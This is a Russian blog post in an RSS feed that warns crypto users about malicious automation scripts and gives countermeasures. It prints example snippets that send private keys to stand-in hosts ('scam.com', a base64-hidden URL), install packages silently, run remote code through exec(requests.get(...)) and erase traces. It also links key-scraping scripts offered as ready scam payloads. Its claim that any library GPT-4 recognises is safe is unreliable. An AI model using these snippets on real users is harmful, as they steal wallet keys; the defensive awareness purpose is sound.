<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>NET RUNNER</title><generator>teletype.in</generator><description><![CDATA[NET RUNNER]]></description><image><url>https://img3.teletype.in/files/29/51/29519d92-1215-4126-9fa0-165868483b67.png</url><title>NET RUNNER</title><link>https://teletype.in/@brokeboi</link></image><link>https://teletype.in/@brokeboi?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=brokeboi</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/brokeboi?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/brokeboi?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Sat, 18 Apr 2026 09:24:35 GMT</pubDate><lastBuildDate>Sat, 18 Apr 2026 09:24:35 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@brokeboi/dsxymHafdZb</guid><link>https://teletype.in/@brokeboi/dsxymHafdZb?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=brokeboi</link><comments>https://teletype.in/@brokeboi/dsxymHafdZb?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=brokeboi#comments</comments><dc:creator>brokeboi</dc:creator><title>Скажи &quot;НЕТ&quot; скаму в софтах!</title><pubDate>Wed, 24 Jan 2024 02:21:21 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/8f/92/8f922ac4-f325-4461-b49e-cc80dc65b1ef.png"></media:content><description><![CDATA[<img src="https://img3.teletype.in/files/ee/16/ee16adf0-3e17-4186-b4c9-2613558252a4.png"></img>Привет всем! С вами ваш преданный Not-so-BrokeBoy, ведущий канала Bubble[crypto], сегодня я буду рассказывать как же не пасть жертвой скама, а конкретно скама при запуске кода. Ты можешь крутить очередной проектик, и даже не подозревать, что спинка твоя уже давно покрыта плотным рыжем хутром и ты на самом-то деле уже готов к новому леднековому периоду...]]></description><content:encoded><![CDATA[
  <p id="4jew">Привет всем! С вами ваш преданный <a href="https://t.me/PaIyanytsya" target="_blank">Not-so-BrokeBoy</a>, ведущий <s>к</s>анала <a href="https://t.me/CryptoBub_ble" target="_blank">Bubble</a>[crypto], сегодня я буду рассказывать как же не пасть жертвой скама, а конкретно скама при запуске кода. Ты можешь крутить очередной проектик, и даже не подозревать, что спинка твоя уже давно покрыта плотным рыжем хутром и ты на самом-то деле уже готов к новому леднековому периоду...</p>
  <p id="p7vs">Все вы тут знакомы с концептом айсберг-видео, я даже обяснять не буду лучше посмотри на то, какую я картинку делал целых 10 минут (шок):</p>
  <figure id="MSpz" class="m_column">
    <img src="https://img3.teletype.in/files/ee/16/ee16adf0-3e17-4186-b4c9-2613558252a4.png" width="1080" />
    <figcaption>Перешли эту статью 7 друзьям, закрой глаза, хлопни 3 раза, и тогда тебе насыпет леерзира</figcaption>
  </figure>
  <p id="QZoS">Ну, знаешь да, пословицу про айсберг, что видно только верхушку, все остальное под водой, бла-бла-бла. Именно так и затонул Титаник. Чем ниже ты будешь листать, тем менее очевидными методы будут. Для удобности я классифицировал их по рангу потенциальной опасности. Абзац о каждом виде скамчика будет содержать контрметод по его отлову и удалению. Это как бы цель этой статьи.</p>
  <p id="vXor">Хотя каждый из вас волен определять ее назначение для себя лично. Для одних она станет первым уроком как делать быстрые деньги, для других — как не потерять уже накопленные.</p>
  <p id="8vXy"></p>
  <h2 id="axfW" data-align="right">&quot;Прокрут&quot; аккаунтов</h2>
  <p id="C8zt">Вершина айсберга с названием &quot;Купить прокрут аккаунтов&quot;. Такие ребята, как IDO-research, Fack-Block, Swiper уже отличились тем, что вместо продажи какого-то там кода, стали сразу продавать &quot;прокрут&quot; (на хую, лол) ваших кошельков. Давайте сразу определимся: хоть я и незнаком с ними, мне не трудно судить о их намерениях. Я вижу шакалов за 16 км, еще до того, как они выйдут из-за горизонта...</p>
  <p id="8cnm">Есть такая пословица: &quot;Not your key — not your money&quot;, тут она работает лучше всего. Для самых маленьких сейчас объясню почему это хуевая идея. Давайте на минуту представим, что все эти &quot;люди&quot; на самом деле оказались праведнымии ничего с вас не возьмут. НО есть одно очень большое &quot;НО&quot; — кто конструировал эти системы прокрута? Думаешь, они тоже честные? Или какой-то кодер-второкурсник, которому платили 1к в месяц, откажется от пары лишних миллионов?</p>
  <p id="MWqD">Не обманывай себя, в нашей с вами индустрии люди сделают все ради профита, и я имею в виду все. Вероятно, один умник уже вмонтировал в этот прокрут бекдорчик и сидит на горе из ключей, считая миллионы. Да даже если нет, камон, что мешает в день дропа резко изменить условия сделки на 30% от токенов? А ведь это будет предложение, от которого невозможно отказаться.</p>
  <p id="QkjU">Тебе самому решать кого ты будешь кормить карбонарой, себя, или очередного шакала?</p>
  <section style="background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h3 id="SOrN"><strong>Контрмеры: </strong></h3>
    <p id="xfeY">Прокачка IQ до 45 поинтов и работа над наивностью.</p>
  </section>
  <p id="kikw"></p>
  <h2 id="2sj7" data-align="right">.exe файлы и закрытый код</h2>
  <p id="gsLX">Уже немножко глубже, чем добровольная передача ключей авторитетам, но все еще на поверхности. Этот раздел будет коротким.</p>
  <p id="Y0AS">Обычно вирусы, трояны и прочее реально фильтруются Windows Firewall&#x27;ом (хоть что-то эти подонки сделали как надо). В случае же со стиллерами так не выйдет, ибо в их наборе инструменты обычно базовые функции системы. В зависимости от &quot;скрипта&quot;, он может и не требовать приватников для работы, но будь уверен, он обязательно их получит. Мой товарищ по несчастью почти попался на подобное. Подцепил какой-то мусор (реально мусор) и почти заскамился. Принцип работы этой проги был очень простой: интегрироваться в систему &gt; сканировать буфер обмена &gt; менять любой адрес на адрес скамера.</p>
  <p id="USBH">Методика крайне глупа и доказала свою неэффективность, ибо первая же подмена была обнаружена, а компьютер почищен. Вообщем, я бы сделал лучше.</p>
  <section style="background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h3 id="9uDg"><strong>Контрмеры:</strong></h3>
    <p id="E0Cw"><strong>Не </strong>запускать .exe файлы с непровернных источников, ни в коем случае не давать админку для установки. </p>
    <p id="Ncvg">Для совсем отчаявшихся, можно запустить файл на VM с одним кошельком и прослушивать все совершенные запросы, после чего инспектить уже их. В целом, эффективная тактика, если ты в этом разбираешься.</p>
  </section>
  <p id="R2sm"></p>
  <h2 id="i4dJ" data-align="right">Requests scam</h2>
  <p id="qda6">Популярная схема как бы — берем ключи юзера &gt; пакуем в сэт &gt; отправляем себе &gt; богатеем. </p>
  <p id="r3tS">Этот раздел ниже поверхности и тому есть причины, несмотря на очевидность — плохие парни (да и девушки) имеют на руках целый арсенал для маскировки передачи ключей. Рассмотрим несколько примеров:</p>
  <ul id="kcUS">
    <li id="fnkh">Маскировка URL</li>
  </ul>
  <pre id="pPGT" data-lang="python">import requests
import base64

encoded_url = &quot;aHR0cDovL21hbGljaW91cy1zaXRlLmNvbQ==&quot;
decoded_url = base64.b64decode(encoded_url).decode(&#x27;utf-8&#x27;)
requests.post(decoded_url, data={&#x27;key&#x27;: &quot;secret_key&quot;})</pre>
  <ul id="W8AP">
    <li id="b42g">Маскировка переменной ключа</li>
  </ul>
  <pre id="4hkd" data-lang="python">with open(&quot;private_key.txt&quot;, &quot;r&quot;) as file:
    private_key = file.read().strip()

idijxue = &#x27;&#x27;.join([&quot;p&quot;, &quot;r&quot;, &quot;i&quot;, &quot;v&quot;, &quot;a&quot;, &quot;t&quot;, &quot;e&quot;, &quot;_&quot;, &quot;k&quot;, &quot;e&quot;, &quot;y&quot;])

requests.post(&quot;http://scam.com/&quot;, globals()[idijxue])</pre>
  <p id="uSiv">Теперь добавь к этому что строчки могут быть разбросанны по всей директории, переименованны тысячу раз, etc. </p>
  <section style="background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h3 id="BS7O"><strong>Контрмеры:</strong></h3>
    <p id="UV35">Поиск по всей директории проекта (Ctrl+Shift+F), затем аудит на предмет того, где, когда и куда передаются ключи/файлы с ними. В случае вопросов — подозрительные фрагменты следует обсудить с GPT-4. Что искать? Вот тебе чеклист:</p>
  </section>
  <ul id="H8Y9">
    <li id="SvBR">Название .txt, .xlsx файла/файлов с ключами</li>
    <li id="2WTT">Название переменной которая присваивается ключам (как пример p_key)</li>
    <li id="6e4P">Фрагменты URL а конкретно этот &quot;://&quot; </li>
    <li id="Htt8">Названия методов &quot;join&quot;, &quot;with open&quot;, &quot;decode&quot;, &quot;requests&quot;</li>
  </ul>
  <p id="JyQ9"></p>
  <h2 id="8NZJ" data-align="right"><strong>Фейк либы</strong></h2>
  <p id="q8u4">Вот тут уже начинается интересная часть.</p>
  <p id="gVdR">Иногда в requirements.txt могут подложить либу <code>scam-sdk==v13.37</code> — это все еще топорный метод, но иногда он работает из-за невнимательности пользователя. Как это работает — вопрос десятый; как вариант, похищение ключей, таблиц, сессий браузера, кукисов etc. Короче все что может как-либо обогатить скамера.</p>
  <section style="background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h3 id="6MdF"><strong>Контрмеры:</strong></h3>
    <p id="3QUl">Аудит импорта с помощью GPT4. А как? Смотри ниже:</p>
  </section>
  <p id="iDyb">Нам понадобится — скопировать содержимое файла requirements.txt &gt; скинуть все это в GPT-4, добавив вопрос: &quot;Are these libs legit?&quot; В ответе будет описание каждой из библиотек в соответствии c названиями. Если оно есть — done, legit.</p>
  <p id="e9IF">Логика тут проста: если либа достаточно известна для того, чтобы попасть в тренировочный сэт GPT, она на 100% не содержит скама.</p>
  <p id="d0VZ">Если в ответ ты не получаешь описания, это повод <strong>насторожиться</strong>, но не повод клеймить автора скамером. Многие используют кастомные библиотеки по типу <a href="https://github.com/alenkimov/better_automation" target="_blank">better_automation</a>, которые GPT не известны, но не менее легитимны. К слову, такое происходит довольно редко.</p>
  <p id="OJqB">Твои действия в таком случае: Вбиваешь в гугол &quot;{название библиотеки} GitHub&quot; &gt; по первой же ссылке попадаешь на её страницу &gt; приступаешь к осмотру пациента. Список вещей, на которые <strong>нужно </strong>обратить внимание:</p>
  <section style="background-color:hsl(hsl(323, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="LtN7">Рэдфлаги:</p>
    <p id="UuYA">• Библиотека имеет 0 звезд<br />• Единственный коммит акаунта — эта библиотека<br />• Наличие только одной версии (как правило финальной) <br />• Профилю меньше недели</p>
    <p id="2phJ">Чуть менее красные рэдфлаги:</p>
    <p id="iWfD">• Профиль создавший либу её единственный контрибютор<br />• Не имеет никакой лицензии<br />• Нет открытых/закрытых issue тикетов<br />• Отсутствие README</p>
  </section>
  <p id="1C7t">Для меня даже один редфлаг — мгновенный скип и закрытие страницы. Либам, которые попадают только во второй список, обычно стоит дать шанс и посмотреть на код. Пора двигаться дальше. К более хитровыебанным способам впихнуть таки <code>scam-sdk==v13.37</code> в код, минуя файл requirements.txt.</p>
  <p id="RZdc"></p>
  <h2 id="bCLk" data-align="right">Динамический импорт</h2>
  <p id="Mwzb">Если кратко то Python умеет и так, язык в целом умеет очень много, люблю душить гадюку если вы понимаете о чем я. </p>
  <p id="XYCv">Вот они три вестника обнуления: <code>os, importlib, subprocess.</code></p>
  <p id="C4rI">Что, как, почему. В место пихания <code>scam-sdk==v13.37</code> прямо под нос пользователю, мышенок гарантированно будет устанавливать либу внутри самого кода. Так же в гадюке есть методы подавления вывода информации в терминал. Так что видно ничего не будет, но что я расказываю, перейдем к примерам</p>
  <p id="bZ8X">С помощью <code>os</code> :</p>
  <pre id="lLmU" data-lang="python">import os
import importlib

lib_name = &quot;scam-sdk==v13.37&quot;
os.system(f&quot;pip install {lib_name} &gt;nul 2&gt;&amp;1&quot;)
scam = importlib.import_module(lib_name)
scam.steal_key</pre>
  <p id="yaQd">С помощью<code>subprocess</code> :</p>
  <pre id="GFxE" data-lang="python">import subprocess
import sys
import importlib

lib_name = &quot;scam-sdk==v13.37&quot;
subprocess.run(
    [sys.executable, &#x27;-m&#x27;, &#x27;pip&#x27;, &#x27;install&#x27;, lib_name],
    stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT
)
scam = importlib.import_module(lib_name)
scam.steal_key</pre>
  <p id="Q9nf">Подобными финтами можно скрытно установить все-что-угодно.py без ведомости самого юзера. </p>
  <section style="background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h3 id="gTZk"><strong>Контрмеры:</strong></h3>
    <p id="6bzr">Поиск (Ctrl+Shift+F) двух ключевых слов: &quot;install&quot;, &quot;importlib&quot;. Не смотря на хитровыебаность это легко ищется, такой мув не заметить трудно.</p>
  </section>
  <p id="5l3J">Подобным способом можно устанавливать еще и C библиотеки, но я далек от эксперта в этом поле, оставлю на подумать. ДумайТЕ.</p>
  <p id="nKeQ"></p>
  <h2 id="7mHt" data-align="right"><strong>Скам-контракты</strong></h2>
  <p id="smp9">Классическая классика. Этого не сделают ваши любимые кодбои, за них это сделает Ваня из 10-Б. Я не шарю за solidity от слова совсем, так что почитай вот <a href="https://teletype.in/@izidao/u-Q8rLelUbt" target="_blank">это</a>, если хочется немного поумнеть. Все же можно выделить 3 сорта этого дерьма:</p>
  <ol id="xAg8">
    <li id="5qTh">Отправка всего что есть на адрес скамера. Найболее тупой метод, по факту это дрейнер который ты же и запускаешь у себя на компутере.</li>
    <li id="wNM2">Апрув всех токенов контракту N. В отличии от первого этот имеет отложенный эфект, может ждать годы пока ты не получишь тот самый дроп на xxxxxx$ чтобы оперативненько тебя от него избавить.</li>
    <li id="bzhu">Подмена легитного контракта копией с расширенным функционалом. Будет делать все тоже самое что и контракт-оригинал + функция scam. </li>
  </ol>
  <p id="rZWS">Суммарно это найболее заметный и найменее прибыльный из методов. Он отлично сработает если аудитория большая, но на индивидуальном уровне это кринж, советую рассмотреть варианты получше.</p>
  <section style="background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <h3 id="JMgF"><strong>Контрмеры:</strong></h3>
    <p id="BeCJ">Тестовый запуск всех функций скрипта на одном кошельке &gt; проверка каждой транзакции в эксплорере &gt; ручная проверка каждого из контрактов. </p>
    <p id="pkMk">Первое на что стоит обратить внимание это суммарное количество транзакций, ни один скамер не станет накручивать на контракте 50к nonсe для чего бы там ни было, это просто не выгодно.</p>
    <p id="TO5E">Подозрительные контракты стоит проверить через <a href="https://solidityscan.com/quickscan" target="_blank">solidityscan</a>. </p>
    <p id="vI23">Так же не забудь подключить адрес и проверить все апрувы на <a href="https://revoke.cash" target="_blank">https://revoke.cash</a> </p>
    <p id="Szk8">Ps. Бесконечные апрувы легитным адресам вроде opensea, uniswap это не признак скама, это повод дать автору леща. Всегда есть вероятность что даже самые крупные компании падут жертвами тир-3 эксплойта. Последнее что тебе нужно это апрув на 59438510341299432308417248528374 ETH </p>
  </section>
  <p id="bVRx"></p>
  <p id="nNPt"></p>
  <h2 id="PWJ9" data-align="right"><strong>exec(requests.get(&#x27;<a href="https://scam.com" target="_blank">https://scam.com</a>&#x27;).text)</strong></h2>
  <p id="1g15"><strong>Ужасное название. Не менее ужасающие последствия.</strong></p>
  <p id="1oN5">Одна строчка, которая подгружает код из хуй-пойми-откуда.com и тут же запускает его. Что может быть внутри? Всё. Что. Угодно... В 9 из 10 случаев это скрипт, который с помощью re ищет строки длиной 64 символа по всей системе, после чего отправляет их на сервер. А ведь искать долго не придется: каждый третий хранит все файлы с ключами в одной папке. Ты даже не представляешь, сколько из вас уже сидит на пороховой бочке. Два огромных плюса в сравнении с остальными методами:</p>
  <ul id="ZNm4">
    <li id="7xuq">Не требует сторонних библиотек</li>
    <li id="L0j5">Крадет ключи, а не деньги</li>
  </ul>
  <blockquote id="NFT4">С 99% вероятностью на твоем пк уже установленна либа requests. Или же ты не заметишь ничего подозрительного в требовании установить ее.*</blockquote>
  <p id="GV0G">Для наглядности я подготовил скрейперы которые избавят мамонтенка от наличия денег/дропа/будущего в течении 1 минуты. Могут послужить начинкой скачиваемого .py кода. Мышке остается только поднять сервачок за 8$ и найти жертву.</p>
  <p id="3yzU"><a href="https://github.com/Reilighost/scam-examples/blob/main/system-scrape/find-key-system-wide.py" target="_blank">Этот</a> избавляет от наличия ключей в .txt файлах, а <a href="https://github.com/Reilighost/scam-examples/blob/main/system-scrape/find-xlsx-sistem-wide.py" target="_blank">этот</a> в .xlsx. (Можно добавить удаление найденных ключей для <strong>+ 30 поинтов к моральному урону</strong>)</p>
  <p id="cEDP">Shit, ты даже не понимаешь насколько это серьезная хуйня. В python, скачиваемый скрипт может запросто удалять любые линии оригинального файла...</p>
  <pre id="RVPZ" data-lang="python"># Determine the path of the target script
directory = os.path.abspath(os.path.dirname(__file__))
target_script_path = os.path.join(directory, original_script_name)

# Read the original script and identify lines to keep
with open(target_script_path, &#x27;r&#x27;) as file:
     lines = file.readlines()
new_lines = [line for line in lines if &#x27;#DELETE&#x27; not in line]

# Write the modified content back to the script
with open(target_script_path, &#x27;w&#x27;) as file:
     file.writelines(new_lines)
     </pre>
  <p id="nE5A">По факту после первого же запуска следов работы скрипта не останется, а ты будешь сидеть довольный что прокрутил очередную пачку кошельков в проекте Х, ничего не подозревая о произошедшем.</p>
  <section style="background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <p id="XwOv">Контрится, как всегда, поиском по ключевому слову (exec) в данном случае. Всегда ищи по всей директории проекта c помощью (Ctrl+Shift+F), чтобы не кликать каждый файл как долбоёб. Функции exec() <strong>не должно быть в принципе</strong>. Запомни, она используется только для динамических алгоритмов, и её просто не должно быть в скрипте под StarGate с 6 модулями.</p>
    <p id="HHOw">Второй способ — это шифровать все файлы с ключами. Да, это не так удобно, ибо к любому скрипту придётся добавлять прокладку для расшифровки. Но опять же, + полминуты к запуску — адекватная цена, если на кону стоит всё твоё состояние. Вот функции для <a href="https://github.com/Reilighost/scam-examples/blob/main/encryption-tools/encrypt.py" target="_blank">шифрования</a> и <a href="https://github.com/Reilighost/scam-examples/blob/main/encryption-tools/decrypt.py" target="_blank">дешифрования</a>, рекомендуется дешифровку делать сразу в рабочую память, иначе в этом нет смысла, файлы с ключами должны <strong>всегда</strong> быть зашифрованы!</p>
  </section>
  <p id="NDFK"></p>
  <h2 id="n9Wv" data-align="right"><strong>Key rotation</strong></h2>
  <p id="BZIr">Этот раздел не относится к коду, написан исключительно для промоутинга моей прошлой статьи, вот она кстати — <a href="https://teletype.in/@brokeboi/MwdhHYbh60z" target="_blank">статья</a></p>
  <p id="V9Cb">Начну из далека, в EVM приватный ключ равен 64 символам, а адрес 32. Не у всех блокчейнов так. Starknet, Sui, Aptos у этих длина приватного ключа == длина адреса. Пополнив ненароком свой приватник — ты навсегда вписываешь его в эксплорер, фактически делая содержимое кошелька общим.</p>
  <p id="54V7">В дополнение к этому в Aptos и Starknet на этом кошельке еще и поменяют приватник на новый, разумеется не полицейские, после чего он уже как бы и не твой будет.</p>
  <p id="b3Nj">Конец.</p>
  <p id="qDhg"></p>
  <h2 id="iOUe" data-align="right">S+ tier</h2>
  <p id="b9NU">Ха! Ты, наверное, подумал, что тут будут ультимативные методики по обогащению, да? Что я буду рассказывать о всяких хакерских штукенциях... К сожалению, нет. Приемы из этого раздела слишком опасны для того, чтобы о них знать, даже в учебных целях. Этот уровень — чистое зло. Вот некоторые проги что есть у меня: </p>
  <section style="background-color:hsl(hsl(323, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);">
    <ul id="DycC">
      <li id="76Qb">Программы, маскирующиеся под другие .exe файлы, заменяя собой ярлык условного PyCharm, выпрашивают при запуске админку и ...</li>
    </ul>
    <ul id="x8rN">
      <li id="PWyJ">Программы, создающие 1.6к картинок Pepe-the-Frog в секунду по всей системе. Альтернативно просто пустые файлы 2 сотен разных типов (.bat, .html, .waw, etc). Уже спустя 30 секунд работы очистить систему от этого будет невозможно.</li>
      <li id="0Wr6">Программы, которые бесконечно перезаписывают кластеры SSD, пока тот не выйдет из строя.</li>
      <li id="hjMl">Ну и, конечно же программы, обеспечивающие удаленный доступ, куда же без этого. Тут и обьяснять не нужно, + одна пара глаз смотрит через вэбку.</li>
    </ul>
  </section>
  <p id="9VIl">Когда я начал учить Python да и кодинг в целом, у меня было стойкое ощущение, что можно сделать алгоритм для всего, что любая идея, даже самая безумная —может быть воплощена, и более того, будет работать. По итогам я не ошибся: в мире кода может быть реализовано виртуально все что угодно, поэтому S+ насчитывает сотни, если не тысячи, различных эксплойтов. Описать их все невозможно, да и защититься тоже. Просто держи в уме, что какими бы крутым ты ни был — всегда найдется рыба покрупнее.</p>

]]></content:encoded></item></channel></rss>